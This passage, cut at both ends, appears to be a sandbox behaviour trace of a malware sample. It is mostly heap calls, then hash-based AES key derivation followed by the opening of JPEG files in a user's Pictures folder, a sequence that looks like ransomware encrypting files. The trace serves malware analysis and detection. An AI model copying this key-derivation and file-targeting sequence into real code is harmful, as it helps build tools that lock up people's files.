hHeap=0x8a0000) returned 1 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.758] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0188.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.759] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2798 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.761] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.761] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.761] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0188.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.762] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0188.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.763] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0188.764] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.764] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0188.764] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.765] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.765] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.765] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.766] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.766] CryptDestroyHash (hHash=0x90af58) returned 1 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\3tvbet hm8klbxn.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.768] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.768] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0188.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt 